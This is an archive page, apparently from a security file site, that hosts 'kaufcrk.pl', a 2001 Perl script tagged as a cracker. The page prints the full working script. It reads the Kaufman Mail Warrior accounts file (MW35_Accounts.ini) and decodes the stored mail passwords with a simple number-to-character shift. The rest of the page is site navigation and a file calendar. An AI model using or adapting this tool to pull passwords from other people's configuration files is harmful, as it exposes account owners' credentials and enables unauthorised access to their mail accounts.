what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

kaufcrk.pl

kaufcrk.pl
Posted Jan 9, 2001
Authored by Xcript | Site rhs-ck.com

Kaufcrk.pl is a perl script which decrypts encrypted passwords found in the Kaufman Mail Warrior accounts file (MW35_Accounts.ini). Tested with Mail Warrior v3.57.

tags | cracker, perl
SHA-256 | 6d02da50dd08b699b4b48b9f13ec09a55001f57bb78271dbcc40120a265e8294

kaufcrk.pl

Change Mirror Download
#!c:/perl/perl.exe

# Description: Decrypts encrypted passwords found in
# the Kaufman Mail Warrior accounts file
# (MW35_Accounts.ini).
#
# Notes: Only tested on Version 3.57 of Kaufman Mail
# Warrior. May or may not be compatible with
# earlier/later releases of the software.
#
# Author: Xcript (xcript@rhs-ck.com)
#
# Website: http://www.rhs-ck.com

if ($#ARGV < 0) {
print "\nUSAGE: perl $0 <accounts file>\n";
exit;
}

$file = $ARGV[0];
$x = 1;
print "\n";
open (FILE, $file) || die (&err);

while (<FILE>) {
if (substr($_, 0, 9) =~/Password=/i) {
($str, $int) = split(/=/, $_);
for ($i = 0; $i < length($int); $i ++) {
$mid = substr($int, $i, 1);
$end = substr($int, $i + 1, 1);
if ($mid eq ',' || $end eq '') {
$str = chr($num + 75);
$pwd = $pwd.$str;
$num = $null;
} else {
$num = $num.$mid;
}
}
print "Password[$x] .: $pwd\n";
$pwd = $null;
$x ++;
}
}

sub err {
print "File not found.\n";
exit;
}

print "No accounts found.\n" if ($x == 1);
print "\nDone.\n" if ($x > 1);
close (FILE);
exit;
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close